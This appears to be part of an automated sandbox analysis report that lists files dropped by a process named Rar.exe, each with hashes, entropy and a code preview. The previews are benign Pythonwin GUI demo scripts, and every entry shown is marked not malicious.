                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4574
                                                                                                                                                                                                                                  Entropy (8bit):4.90853148325504
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:VyZpdD4ZyBMuDVv2n65x5yy04esYX1GaKJPT:84ZCM09G+iTKJPT
                                                                                                                                                                                                                                  MD5:4A63AE2B6A65373F1092B910B69CF62C
                                                                                                                                                                                                                                  SHA1:ABAF62EE2CBB8E0C5F420CEBB641752CFC34F3BD
                                                                                                                                                                                                                                  SHA-256:851EC7CB72ADE79088ED54C018AD4A976AA2A82BB201CCB603C592023D529319
                                                                                                                                                                                                                                  SHA-512:DD4408B6FC46C4C0BC02818D1E6B4BAD0CC4F8E23788B60FF82FC33F4E17143C6AF48228823570D0EC57082B7F8198F517E144700E55E5C094CBFB361D34E698
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A Demo of Pythonwin's Dialog and Property Page support...###################.#.# First demo - use the built-in to Pythonwin "Tab Stop" dialog, but.# customise it heavily..#.# ID's for the tabstop dialog - out test..#.import win32con.import win32ui.from pywin.mfc import dialog.from win32con import IDCANCEL.from win32ui import IDC_EDIT_TABS, IDC_PROMPT_TABS, IDD_SET_TABSTOPS...class TestDialog(dialog.Dialog):. def __init__(self, modal=1):. dialog.Dialog.__init__(self, IDD_SET_TABSTOPS). self.counter = 0. if modal:. self.DoModal(). else:. self.CreateWindow().. def OnInitDialog(self):. # Set the caption of the dialog itself.. self.SetWindowText("Used to be Tab Stops!"). # Get a child control, remember it, and change its text.. self.edit = self.GetDlgItem(IDC_EDIT_TABS) # the text box.. self.edit.SetWindowText("Test"). # Hook a Windows message for the dialog.. self.edit.HookMessage(se
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2829
                                                                                                                                                                                                                                  Entropy (8bit):5.242178972131811
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:fmzWPx3GuGsTqAT1hqliPcgsgjPLGq5dIOGD1w5uyrN9w3dvHqAV5xmGbz8:+zm4uGP5JqTGqF5BHqZ5xmY8
                                                                                                                                                                                                                                  MD5:6649A11465ACC00ECBE64D50034B5281
                                                                                                                                                                                                                                  SHA1:11490980CF7A94A268674A413406C451877E288F
                                                                                                                                                                                                                                  SHA-256:1277E4F1754310D687BF685CA33B626E04929EFE3F354FDD9081B1EF8F7C766F
                                                                                                                                                                                                                                  SHA-512:DDFB2DF458741CF40BF1FFA1D6572E5D7E488F16D5759003B8752B71AC2B1296F70620E9615A458D6DCC3E7C0C3EBB31E68D7C18293D2684A1B434C8804271D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# dyndlg.py.# contributed by Curt Hagenlocher <chi@earthlink.net>..# Dialog Template params:.# .Parameter 0 - Window caption.# .Parameter 1 - Bounds (rect tuple).# .Parameter 2 - Window style.# .Parameter 3 - Extended style.# .Parameter 4 - Font tuple.# .Parameter 5 - Menu name.# .Parameter 6 - Window class.# Dialog item params:.# .Parameter 0 - Window class.# .Parameter 1 - Text.# .Parameter 2 - ID.# .Parameter 3 - Bounds.# .Parameter 4 - Style.# .Parameter 5 - Extended style.# .Parameter 6 - Extra data...import win32con.import win32ui.from pywin.mfc import dialog, window...def MakeDlgTemplate():. style = (. win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). cs = win32con.WS_CHILD | win32con.WS_VISIBLE. dlg = [. ["Select Warehouse", (0, 0, 177, 93), style, None, (8, "MS Sans Serif")],. ]. dlg.append([130, "Current Warehouse:", -1,
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2759
                                                                                                                                                                                                                                  Entropy (8bit):4.974631778635262
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:74tR9wr5J+Vs3x95vgQppI4OyaL/1I4t7T/tcD+jHgMzC:MR9mc2XZ1pIFtDy4pT/tzjHVzC
                                                                                                                                                                                                                                  MD5:EC4DFE4E14541E236CB0ED2C6EF45C45
                                                                                                                                                                                                                                  SHA1:527BCD37188373C6C903B532A9E2B94D4738799E
                                                                                                                                                                                                                                  SHA-256:566ED0C5460B8591E49788F20E60F716F6BDE99F497DAF9CB8A172C101D1C586
                                                                                                                                                                                                                                  SHA-512:4F5125D4C755C725FA448369E1EA5DF0444D527B03A39E140E7EE6184AF8EAC7AC5920DDF794A0C1AD14FD0ABB9F2DC6117D03234A8F8D54C559832B751E48EB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Demo of Generic document windows, DC, and Font usage.# by Dave Brennan (brennan@hal.com)..# usage examples:..# >>> from fontdemo import *.# >>> d = FontDemo('Hello, Python').# >>> f1 = { 'name':'Arial', 'height':36, 'weight':win32con.FW_BOLD}.# >>> d.SetFont(f1).# >>> f2 = {'name':'Courier New', 'height':24, 'italic':1}.# >>> d.SetFont (f2)..import win32api.import win32con.import win32ui.from pywin.mfc import docview..# font is a dictionary in which the following elements matter:.# (the best matching font to supplied parameters is returned).# name..string name of the font as known by Windows.# size..point size of font in logical units.# weight..weight of font (win32con.FW_NORMAL, win32con.FW_BOLD).# italic..boolean; true if set to anything but None.# underline.boolean; true if set to anything but None...class FontView(docview.ScrollView):. def __init__(. self, doc, text="Python Rules!", font_spec={"name": "Arial", "height": 42}. ):. docview.ScrollView.__
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2709
                                                                                                                                                                                                                                  Entropy (8bit):4.491038307415068
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:0kg2g3zeqdFSLlcMGfmTeg24Kjvx3RRV6Wwn:hgfRcca92PvxbVwn
                                                                                                                                                                                                                                  MD5:52EA743C9A5F7CFCC05CF59610DF6422
                                                                                                                                                                                                                                  SHA1:83D3CB7B21E5B5C07B24A947F53240A42A9529BF
                                                                                                                                                                                                                                  SHA-256:23AE39A4E5BE89FA81F2DF290AC79BF83C4A2D24026D81EDCCBB3474E5E3EE71
                                                                                                                                                                                                                                  SHA-512:44CE3E58DF0A4395C6359176EFBE8D731D64DD6EA55442B443FEF270EB5DD03860A661EA664CC4C4907447C365363E47375EDCF9AB0967F398AF9FC42F96E331
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# GUI Demo - just a worker script to invoke all the other demo/test scripts..import sys..import __main__.import regutil.import win32api.import win32ui..demos = [ # .('Font', 'import fontdemo;fontdemo.FontDemo()'),. ("Open GL Demo", "import openGLDemo;openGLDemo.test()"),. ("Threaded GUI", "import threadedgui;threadedgui.ThreadedDemo()"),. ("Tree View Demo", "import hiertest;hiertest.demoboth()"),. ("3-Way Splitter Window", "import splittst;splittst.demo()"),. ("Custom Toolbars and Tooltips", "import toolbar;toolbar.test()"),. ("Progress Bar", "import progressbar;progressbar.demo()"),. ("Slider Control", "import sliderdemo;sliderdemo.demo()"),. ("Dynamic window creation", "import createwin;createwin.demo()"),. ("Various Dialog demos", "import dlgtest;dlgtest.demo()"),. ("OCX Control Demo", "from ocx import ocxtest;ocxtest.demo()"),. ("OCX Serial Port Demo", "from ocx import ocxserialtest;.ocxserialtest.test()"),. (. "IE4 Control Demo",.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3766
                                                                                                                                                                                                                                  Entropy (8bit):4.7759365871499115
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:tAvEDSXSimgEb36/O2W9NebOVQOVDsEuExIczHUQ:tWE7/mJWreyNdxf0Q
                                                                                                                                                                                                                                  MD5:27345B318FAE042B9638336FAB47DC65
                                                                                                                                                                                                                                  SHA1:ACEB5D20D5E013458366D1EFF0BEFC25E6DF3E0E
                                                                                                                                                                                                                                  SHA-256:5002F752137A85F1EAD040A6B763F6B1B18D159E19CDF618CAEC411D1DA2D6C0
                                                                                                                                                                                                                                  SHA-512:7D6198D2D03764F3C12CE796DB74532B0930107409E832879AD20F9765334BFF34CD20E6DF34C8BB69348648476436AE1660F699D97890FA3C23FC4011849C63
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import commctrl.import win32ui.from pywin.mfc import docview, window.from pywin.tools import hierlist...# directory listbox.# This has obvious limitations - doesnt track subdirs, etc. Demonstrates.# simple use of Python code for querying the tree as needed..# Only use strings, and lists of strings (from curdir()).class DirHierList(hierlist.HierList):. def __init__(self, root, listBoxID=win32ui.IDC_LIST1):. hierlist.HierList.__init__(self, root, win32ui.IDB_HIERFOLDERS, listBoxID).. def GetText(self, item):. return os.path.basename(item).. def GetSubList(self, item):. if os.path.isdir(item):. ret = [os.path.join(item, fname) for fname in os.listdir(item)]. else:. ret = None. return ret.. # if the item is a dir, it is expandable.. def IsExpandable(self, item):. return os.path.isdir(item).. def GetSelectedBitmapColumn(self, item):. return self.GetBitmapColumn(item) + 6 # Use different col
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):490
                                                                                                                                                                                                                                  Entropy (8bit):4.790457084981066
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:Sq3VGrAF3xMjLmJVwUXYQ3EAjpAeoQbk/AIL/hXwlfNI6lmH4yHFS31l0rcb5b+1:JUk4LmbLU2pJxIIIThPGo41ldx+1
                                                                                                                                                                                                                                  MD5:B85C91F60CCD40AFA34E217F6C730DEB
                                                                                                                                                                                                                                  SHA1:4254190DC95206CD2DE7DC75E0A11844D623B862
                                                                                                                                                                                                                                  SHA-256:9B32896D9931F16907578519A48A5172BA8F257D64F65C41C327ACF1948DB1D8
                                                                                                                                                                                                                                  SHA-512:7EDA504EFF850B8784A862353532F8DEAFFBE742DE7840C55600561C907202300237702217840CB8E3D381FAFC19A791960B37213942413BDF34A4CDD05DD93F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Run this as a python script, to gray "close" off the edit window system menu..import win32con.from pywin.framework import interact..if __name__ == "__main__":. import demoutils.. if demoutils.NeedGoodGUI():. win = interact.edit.currentView.GetParent(). menu = win.GetSystemMenu(). id = menu.GetMenuItemID(6). menu.EnableMenuItem(id, win32con.MF_BYCOMMAND | win32con.MF_GRAYED). print("The interactive window's 'Close' menu item is now disabled.").
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1727
                                                                                                                                                                                                                                  Entropy (8bit):4.598187757077594
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:qGpxE2ahvgtBXKTAESwAHplowG/hfMLy+FLjbABS/AYmXDf8b0zaFlBpJn:Rpxba0KTMwIpvG/9+tjbv/1qmFlB/n
                                                                                                                                                                                                                                  MD5:9EF7E46AFDD9638F0B839B9A5CB199D4
                                                                                                                                                                                                                                  SHA1:D0E85A815263617BDDB74084BDAD38D8B36153C0
                                                                                                                                                                                                                                  SHA-256:BE40CA9EB9BFDDF7D3B6B506E8E11E22746BC9A970ED1705B873F871968CBCBC
                                                                                                                                                                                                                                  SHA-512:9F377F2ECB233A826EECC7008848C7AD4BA2A171A57E33F85F002D8E2EC65A8111F35B8A68E7CE2333A7AB7D59B2975042203980602BF936AA034F8A19493878
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This is a sample file, and shows the basic framework for using an "Object" based.# document, rather than a "filename" based document..# This is referenced by the Pythonwin .html documentation...# In the example below, the OpenObject() method is used instead of OpenDocumentFile,.# and all the core MFC document open functionality is retained...import win32ui.from pywin.mfc import docview...class object_template(docview.DocTemplate):. def __init__(self):. docview.DocTemplate.__init__(self, None, None, None, object_view).. def OpenObject(self, object): # Use this instead of OpenDocumentFile.. # Look for existing open document. for doc in self.GetDocumentList():. print("document is ", doc). if doc.object is object:. doc.GetFirstView().ActivateFrame(). return doc. # not found - new one.. doc = object_document(self, object). frame = self.CreateNewFrame(doc). doc.OnNewDocument().
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1501
                                                                                                                                                                                                                                  Entropy (8bit):4.880256056364068
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:Pbg7AU1OuFkM/mpDbOXIacP8iSig1FZa4Qcbs53mVQ7Y1AsI1W6OTpb:zg7RHNYacPSia0LcbsoYY1Amt
                                                                                                                                                                                                                                  MD5:EA40A2E7FA0D59B4FBA8E17624001F16
                                                                                                                                                                                                                                  SHA1:4AB2487C5DE2CF2787F744CBF43B6679F008AFDF
                                                                                                                                                                                                                                  SHA-256:98C8D8EFCA13834E1C7288BE825DBFB5165E0D00BDD25E22123147ED63A757E8
                                                                                                                                                                                                                                  SHA-512:C2B9FC28E717FE17A5F99B2B78AFB2B4489A76F964F984C35227D4A25927660D5140333E5C4AEAA201074B45FC2A4A64C036340394E64C5F7ADBCCECF52CFAB9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Utilities for the demos..import sys..import win32api.import win32con.import win32ui..NotScriptMsg = """\.This demo program is not designed to be run as a Script, but is.probably used by some other test program. Please try another demo.."""..NeedGUIMsg = """\.This demo program can only be run from inside of Pythonwin..You must start Pythonwin, and select 'Run' from the toolbar or File menu."""...NeedAppMsg = """\.This demo program is a 'Pythonwin Application'...It is more demo code than an example of Pythonwin's capabilities...To run it, you must execute the command:.pythonwin.exe /app "%s"..Would you like to execute it now?."""...def NotAScript():. import win32ui.. win32ui.MessageBox(NotScriptMsg, "Demos")...def NeedGoodGUI():. from pywin.framework.app import HaveGoodGUI.. rc = HaveGoodGUI(). if not rc:. win32ui.MessageBox(NeedGUIMsg, "Demos"). return rc...def NeedApp():. import win32ui.. rc = win32ui.MessageBox(NeedAppMsg % sys.argv[0], "Demos", win32
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3019
                                                                                                                                                                                                                                  Entropy (8bit):4.928109370801704
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:EI3lvFKgppcWFkRC2Y5icp7SBpsHOPQoOL4w1YzBBgVCi6jgIPOUhVA5Os+YpsuW:EMsgpPx5Rp7ypUOIzLNaVs76jgI2J5OT
                                                                                                                                                                                                                                  MD5:8EB47FD8B69A81F278B4ABE11DC245FD
                                                                                                                                                                                                                                  SHA1:72E0F17EE9D8AE16D436E26459F4743B0CB28D96
                                                                                                                                                                                                                                  SHA-256:46B673EBB38C49A54880E80C2393A8CDC1E624876DF3BE579ACF50695A68B62D
                                                                                                                                                                                                                                  SHA-512:C38B67626D233229A089F1FB1DF0F25882173D59637D3151CC6143DBD41E454BC5A35A52664E64B0FF40DF538E88E5C9D3D57E5F60FF2662A4A5F99BEC1CA142
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# By Bradley Schatz.# simple flash/python application demonstrating bidirectional.# communicaion between flash and python. Click the sphere to see.# behavior. Uses Bounce.swf from FlashBounce.zip, available from.# http://pages.cpsc.ucalgary.ca/~saul/vb_examples/tutorial12/..# Update to the path of the .swf file (note it could be a true URL).flash_url = "c:\\bounce.swf"..import sys..import regutil.import win32api.import win32con.import win32ui.from pywin.mfc import activex, window.from win32com.client import gencache..FlashModule = gencache.EnsureModule("{D27CDB6B-AE6D-11CF-96B8-444553540000}", 0, 1, 0)..if FlashModule is None:. raise ImportError("Flash does not appear to be installed.")...class MyFlashComponent(activex.Control, FlashModule.ShockwaveFlash):. def __init__(self):. activex.Control.__init__(self). FlashModule.ShockwaveFlash.__init__(self). self.x = 50. self.y = 50. self.angle = 30. self.started = 0.. def OnFSCommand(self, c
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5048
                                                                                                                                                                                                                                  Entropy (8bit):4.781620280031484
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:i6/+MX858voTQg3Uzk29LYWu2VuiAKMebC6IzKHc5Yp1PIEsuI:JA5QHhYWu+A2Cxip5IoI
                                                                                                                                                                                                                                  MD5:4374102AE9A00E5C51450DF55F17BD17
                                                                                                                                                                                                                                  SHA1:19B9B8347066EB7F01194EE7FB2EBF700BCD0762
                                                                                                                                                                                                                                  SHA-256:A23CF5E8F0DAE332035DD1081B32A7DDBC0BD697DB1A68EDAB52B0FAC25B3BF7
                                                                                                                                                                                                                                  SHA-512:03CF3052789CA0A6BC05C8B02950A2B0EE4B0EB1EFE599D4008DF6BE1C502A6E79F8A57F9ECE082685310914F863F8A1204443276E1120BA9A9A48421DDEFA68
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This demo uses some of the Microsoft Office components..#.# It was taken from an MSDN article showing how to embed excel..# It is not comlpete yet, but it _does_ show an Excel spreadsheet in a frame!.#..import regutil.import win32con.import win32ui.import win32uiole.from pywin.mfc import activex, docview, object, window.from win32com.client import gencache..# WordModule = gencache.EnsureModule('{00020905-0000-0000-C000-000000000046}', 1033, 8, 0).# if WordModule is None:.# .raise ImportError, "Microsoft Word version 8 does not appear to be installed."...class OleClientItem(object.CmdTarget):. def __init__(self, doc):. object.CmdTarget.__init__(self, win32uiole.CreateOleClientItem(doc)).. def OnGetItemPosition(self):. # For now return a hard-coded rect.. return (10, 10, 210, 210).. def OnActivate(self):. # Allow only one inplace activate item per frame. view = self.GetActiveView(). item = self.GetDocument().GetInPlaceActiveItem(view).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3611
                                                                                                                                                                                                                                  Entropy (8bit):4.749470057382686
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:JG/qBKrkDETqAT1hqmiaLvXWNKcqMjpoKFuKbpIV7UC/RpIiC5KHrZN/UZ/CH7u:w/XqEnv6KxS/FuKbpAUNKVNs/CHS
                                                                                                                                                                                                                                  MD5:08EC418B44BDC4D47C8EBEF15421B891
                                                                                                                                                                                                                                  SHA1:088CCBD0F7EC44ABF192129F3864ADBE41C35B63
                                                                                                                                                                                                                                  SHA-256:694A4B0C8CC306559242C2973FFF638AFC13848E9AB49C6D213581010EDC5591
                                                                                                                                                                                                                                  SHA-512:4F26F2F8C3FCFE4A1D7FDC0CF60D319E7590D8993CCF37FBFE755D7E37CE779453A6341E30AF7BEA6924634232269CBA792A248536988E8A82CDDFC82CB483CD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ocxserialtest.py.#.# Sample that uses the mscomm OCX to talk to a serial.# device...# Very simple - queries a modem for ATI responses..import pythoncom.import win32con.import win32ui.import win32uiole.from pywin.mfc import activex, dialog.from win32com.client import gencache..SERIAL_SETTINGS = "19200,n,8,1".SERIAL_PORT = 2..win32ui.DoWaitCursor(1).serialModule = gencache.EnsureModule("{648A5603-2C6E-101B-82B6-000000000014}", 0, 1, 1).win32ui.DoWaitCursor(0).if serialModule is None:. raise ImportError("MS COMM Control does not appear to be installed on the PC")...def MakeDlgTemplate():. style = (. win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). cs = win32con.WS_CHILD | win32con.WS_VISIBLE. dlg = [. ["Very Basic Terminal", (0, 0, 350, 180), style, None, (8, "MS Sans Serif")],. ]. s = win32con.WS_TABSTOP | cs. dlg.append(.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6805
                                                                                                                                                                                                                                  Entropy (8bit):4.779699424357507
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:85MiGinGqzC9//qIV4dKwvwjZUMIv3KISiKyvb6gJ5c5YpL14gDY/kT:8SilkAIjZMvhDyipJ4gDY/kT
                                                                                                                                                                                                                                  MD5:455C39408751DF999C31ED6F3FE9F254
                                                                                                                                                                                                                                  SHA1:7F6508DE9C98BC42B98ACB16E0AB22205A4092ED
                                                                                                                                                                                                                                  SHA-256:C8029BF8681AF4253E8438B6BAC35C4882E38613CA0540AF64CF47B532F55A94
                                                                                                                                                                                                                                  SHA-512:97A4F7543C23C8907347360B8598E866935B8D3287FFF12BFEDBF86B786704DE1B72259DAD85037D41E4F1DCE84CEB8B0C45F12A322A0723E9756B89F4A2CBDA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# OCX Tester for Pythonwin.#.# This file _is_ ready to run. All that is required is that the OCXs being tested.# are installed on your machine..#.# The .py files behind the OCXs will be automatically generated and imported...import glob.import os..import win32api.import win32con.import win32ui.import win32uiole.from pywin.mfc import activex, dialog, window.from win32com.client import gencache...def MakeDlgTemplate():. style = (. win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). cs = win32con.WS_CHILD | win32con.WS_VISIBLE. dlg = [. ["OCX Demos", (0, 0, 350, 350), style, None, (8, "MS Sans Serif")],. ]. s = win32con.WS_TABSTOP | cs. # .dlg.append([131, None, 130, (5, 40, 110, 48),. # ..s | win32con.LBS_NOTIFY | win32con.LBS_SORT | win32con.LBS_NOINTEGRALHEIGHT | win32con.WS_VSCROLL | win32con.WS_BORDER]). # .dlg.append(["{
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2293
                                                                                                                                                                                                                                  Entropy (8bit):4.965254916940284
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:8Snml4kgp+QLkRNSKWyi6jgIYlOUhVA5Os+YpHdVfjs+YpFHTzbPrcI:8mmqkgp/MsL6jgIZJ5O5Ypjj5YpFHHbz
                                                                                                                                                                                                                                  MD5:11E0E9DCB09236A30FC93183311B3715
                                                                                                                                                                                                                                  SHA1:BDC80B51387F688765CE47B51DF49F030097BDDA
                                                                                                                                                                                                                                  SHA-256:DD4009EB857380EF985C4B3949F46B979782DCF33451A4C323296880A02380C1
                                                                                                                                                                                                                                  SHA-512:F8B8BE06C7F48DCC1028C019A5CCF68E50471D18CD0082CE56C6443C96151F941E090EF50C1A72B2B5313D967A182A970DBF1303A0BD9418BD2E96B88F45E2D4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This demo uses the IE4 Web Browser control...# It catches an "OnNavigate" event, and updates the frame title..# (event stuff by Neil Hodgson)..import sys..import regutil.import win32api.import win32con.import win32ui.from pywin.mfc import activex, window.from win32com.client import gencache..WebBrowserModule = gencache.EnsureModule(. "{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}", 0, 1, 1.).if WebBrowserModule is None:. raise ImportError("IE4 does not appear to be installed.")...class MyWebBrowser(activex.Control, WebBrowserModule.WebBrowser):. def OnBeforeNavigate2(. self, pDisp, URL, Flags, TargetFrameName, PostData, Headers, Cancel. ):. self.GetParent().OnNavigate(URL). # print "BeforeNavigate2", pDisp, URL, Flags, TargetFrameName, PostData, Headers, Cancel...class BrowserFrame(window.MDIChildWnd):. def __init__(self, url=None):. if url is None:. self.url = regutil.GetRegisteredHelpFile("Main Python Documentation"). if sel
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9789
                                                                                                                                                                                                                                  Entropy (8bit):4.91335626349889
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:uBDIizYdIFW8DVmzCqLiyH0Sy1gUhEH3zKhOntDD4O6VkjhOn2lWDiMoc2+SEWM6:uBDIizp1DVmzCakhceADs6BlWDnEtX
                                                                                                                                                                                                                                  MD5:D648E38AC8E7A16233B148A450658DD0
                                                                                                                                                                                                                                  SHA1:F7254260716A0D935347EC59A9FE481AB01AA9AF
                                                                                                                                                                                                                                  SHA-256:F5F8C95CF4E03CCED246038AF998635858E6EBF4676C8D71AD36E79850888248
                                                                                                                                                                                                                                  SHA-512:1ABCAB396FBACBC7E83F1A96C33D624AD55989A925A741778EDA5D4574D2C0DBBF662CD897C4F19B8DD7B2F55BFF89C5379FCEEAC645CC1E57AC3EDBC3AFF6BC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Ported from the win32 and MFC OpenGL Samples...import sys..from pywin.mfc import docview..try:. from OpenGL.GL import * # nopycln: import. from OpenGL.GLU import * # nopycln: import.except ImportError:. print("The OpenGL extensions do not appear to be installed."). print("This Pythonwin demo can not run"). sys.exit(1)..import timer.import win32api.import win32con.import win32ui..PFD_TYPE_RGBA = 0.PFD_TYPE_COLORINDEX = 1.PFD_MAIN_PLANE = 0.PFD_OVERLAY_PLANE = 1.PFD_UNDERLAY_PLANE = -1.PFD_DOUBLEBUFFER = 0x00000001.PFD_STEREO = 0x00000002.PFD_DRAW_TO_WINDOW = 0x00000004.PFD_DRAW_TO_BITMAP = 0x00000008.PFD_SUPPORT_GDI = 0x00000010.PFD_SUPPORT_OPENGL = 0x00000020.PFD_GENERIC_FORMAT = 0x00000040.PFD_NEED_PALETTE = 0x00000080.PFD_NEED_SYSTEM_PALETTE = 0x00000100.PFD_SWAP_EXCHANGE = 0x00000200.PFD_SWAP_COPY = 0x00000400.PFD_SWAP_LAYER_BUFFERS = 0x00000800.PFD_GENERIC_ACCELERATED = 0x00001000.PFD_DEPTH_DONTCARE = 0x20000000.PFD_DOUBLEBUFFER_DONTCARE = 0x40000000.PFD_STEREO_D
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2470
                                                                                                                                                                                                                                  Entropy (8bit):4.7309423091111595
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:WOXUCKcgTo9kA+TqAT1h+HXGmzVJ8ZYLhWHVzrz+H5npLoIT:wT+7TXl8Z3uL9T
                                                                                                                                                                                                                                  MD5:55B794C6746C1ED94E8D09FC411B4094
                                                                                                                                                                                                                                  SHA1:777B1AF92BE4692D65F57A439E7D54A82073D9B0
                                                                                                                                                                                                                                  SHA-256:4DD947D0B90B6CB2EDFCF5B8A4429EC13D58ABEB8C33CD8800536B5D8029D725
                                                                                                                                                                                                                                  SHA-512:9141BF61AAB9DFDD8777E3114FBB1625CE7A20295A96409521D2503AC276EAC4D1C15F1339DBB22D2E959157D557C5F5758689D9E8860E24DDE382537D77FAB9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Progress bar control example.#.# .PyCProgressCtrl encapsulates the MFC CProgressCtrl class. To use it,.# .you:.#.# .- Create the control with win32ui.CreateProgressCtrl().# .- Create the control window with PyCProgressCtrl.CreateWindow().# .- Initialize the range if you want it to be other than (0, 100) using.# . PyCProgressCtrl.SetRange().# .- Either:.# . - Set the step size with PyCProgressCtrl.SetStep(), and.# . - Increment using PyCProgressCtrl.StepIt().# . or:.# . - Set the amount completed using PyCProgressCtrl.SetPos().#.# Example and progress bar code courtesy of KDL Technologies, Ltd., Hong Kong SAR, China..#..import win32con.import win32ui.from pywin.mfc import dialog...def MakeDlgTemplate():. style = (. win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). cs = win32con.WS_CHILD | win32con.WS_VISIBLE.. w = 215. h = 36.. d
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
